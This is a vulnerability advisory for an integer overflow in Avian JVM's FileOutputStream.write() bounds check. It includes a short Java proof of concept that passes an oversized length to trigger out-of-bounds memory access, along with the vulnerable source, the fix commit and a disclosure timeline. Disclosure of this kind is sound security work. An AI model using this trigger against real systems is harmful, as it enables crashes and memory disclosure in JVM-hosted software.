Vulnerability title: Avian JVM FileOutputStream.write() Integer Overflow Author: Pietro Oliva Vendor: ReadyTalk Product: Avian JVM Affected version: 1.2.0 before 27th October 2020 Fixed Version: 1.2.0 since 27th October 2020 Description: The issue is located in the FileOutputStream.write() method defined in FileOutputStream.java, where a boundary check is performed in order to prevent out-of-bounds memory read/write. However, this check contained an integer overflow which leads to the same check being bypassed and out-of-bounds read/write. Impact: Attackers could exploit this vulnerability to read/write arbitrary content in the JVM memory. This could in turn result in denial of service, memory disclosure, or arbitrary code execution in the context of the JVM. Exploitation: The following PoC would trigger an OOB read/write and/or crash of Avian JVM: import java.io.IOException; import java.io.FileDescriptor; import java.io.FileOutputStream; public class poc { public static void main(String[] args) throws IOException { byte[] data = "somedata".getBytes(); FileDescriptor fd = new FileDescriptor().out; FileOutputStream fos = new FileOutputStream(fd); fos.write(data, 1, 0x7fffffff); // Integer overflow + OOB read/write here } } Evidence: public void write(byte[] b, int offset, int length) throws IOException { if (b == null) { throw new NullPointerException(); } if (offset < 0 || offset + length > b.length) { // Integer overflow here throw new ArrayIndexOutOfBoundsException(); } write(fd, b, offset, length); } extern "C" JNIEXPORT void JNICALL Java_java_io_FileOutputStream_write__I_3BII(JNIEnv* e, jclass, jint fd, jbyteArray b, jint offset, jint length) { jbyte* data = static_cast<jbyte*>(malloc(length)); if (data == 0) { throwNew(e, "java/lang/OutOfMemoryError", 0); return; } e->GetByteArrayRegion(b, offset, length, data); if (not e->ExceptionCheck()) { doWrite(e, fd, data, length); } free(data); } void JNICALL GetByteArrayRegion(Thread* t, jbyteArray array, jint offset, jint length, jbyte* dst) { ENTER(t, Thread::ActiveState); if (length) { // Out-of-bounds read/write here memcpy(dst, &(*array)->body()[offset], length * sizeof(jbyte)); } } As can be observed above, offset+length can overflow in FileOutputStream.write() and later result in OOB read/write during memcpy() in GetByteArrayRegion(). Mitigating factors: Since offset needs to be a positive integer, and length is limited to a valid malloc argument, there is a limited range of memory where an attacker could read or write as a result of this vulnerability. Remediation: A fix has been made available with the following commit: https://github.com/ReadyTalk/avian/commit/0871979b298add320ca63f65060acb7532c8a0dd Disclosure timeline: 20th October 2020 - Vulnerability reported. 20th October 2020 - Vulnerability acknowledged. 20th October 2020 - CVE request sent to Mitre. 23rd October 2020 - Sent reminder to Mitre. 27th October 2020 - Sent reminder to Mitre. 27th October 2020 - Patch proposed via pull request. 27th October 2020 - Patch merged into master branch. 29th October 2020 - Sent reminder to Mitre. 2nd November 2020 - CVE request sent again to Mitre. 11th November 2020 - Vulnerability details shared on fulldisclosure without CVE identifier.